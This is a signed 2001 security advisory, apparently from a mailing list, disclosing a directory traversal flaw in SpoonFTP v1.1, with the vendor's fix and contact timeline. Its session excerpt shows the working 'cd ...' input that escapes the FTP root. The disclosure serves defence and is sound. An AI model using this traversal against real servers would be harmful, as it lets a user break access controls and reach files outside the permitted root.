Vulnerability in SpoonFTP

[joetesta () hushmail com]

-----BEGIN PGP SIGNED MESSAGE-----

Vulnerability in SpoonFTP




    Overview

SpoonFTP v1.1 is an ftp server available from http://www.pi-soft.com/.
A vulnerability exists which allows a remote user to break out of the ftp root.




    Details

The following excerpt demonstrates the problem; an ftp root of 'D:\root\root\' was
used:


> ftp localhost
Connected to xxxxxxxx.rh.rit.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ...
250 CWD command successful.
ftp> pwd
257 "/..." is current directory.
ftp>




    Solution

Upgrade to V1.1.0.1 at: http://www.pi-soft.com/spoonftp/sftp.exe




    Vendor Status

Pi-Soft Consulting, LLC was contacted via <support () pi-soft com> on Tuesday,
September 18, 2001.  This vulnerability was fixed in a matter of hours.






    - Joe Testa

e-mail:   joetesta () hushmail com
web page: http://hogs.rit.edu/~joet/
AIM:      LordSpankatron


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.0

wl0EARECAB0FAjuqRIsWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNBjk
AJ99Iu7Ntbv4M1lYS3KZOEyNkK4a7QCeIromIWdZdj2Wc5qySXbKLHZZlmk=
=hK2i
-----END PGP SIGNATURE-----